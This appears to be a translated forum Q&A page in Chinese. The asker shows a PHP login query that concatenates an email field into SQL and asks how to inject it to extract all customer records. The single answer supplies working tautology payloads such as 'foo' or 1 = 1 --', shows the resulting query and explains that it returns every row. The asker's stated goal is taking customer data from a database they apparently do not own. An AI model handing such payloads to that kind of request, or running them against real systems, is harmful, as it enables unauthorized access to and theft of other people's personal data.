如何sql注入这个?

kx1ctssn  于 2021-08-13  发布在  Java
关注(0)|答案(1)|浏览(396)

关闭。这个问题需要细节或清晰。它目前不接受答案。
**想改进这个问题吗?**通过编辑这个帖子来添加细节并澄清问题。

11个月前关门了。
改进这个问题

mysql_select_db($database_db, $db);
query_user = "SELECT * FROM customers WHERE email = '$login'";
user = mysql_query($query_user, $db) or die(mysql_error());
row_user = mysql_fetch_assoc($user);
totalRows_user = mysql_num_rows($user);

我需要一些帮助,我知道这可能是注射我需要把所有的客户资料在数据库中。请帮忙。

iih3973s

iih3973s1#

这将起作用:

foo' or 1 = 1 --

或者,由于您正在运行mysql:

foo' or 1 --

当连接到查询字符串中时,将生成:

SELECT *
FROM customers 
WHERE email = 'foo' or 1 = 1 -- '

不管第一个条件的结果如何,第二个条件的计算结果为true,因此查询返回表中的所有行。

相关问题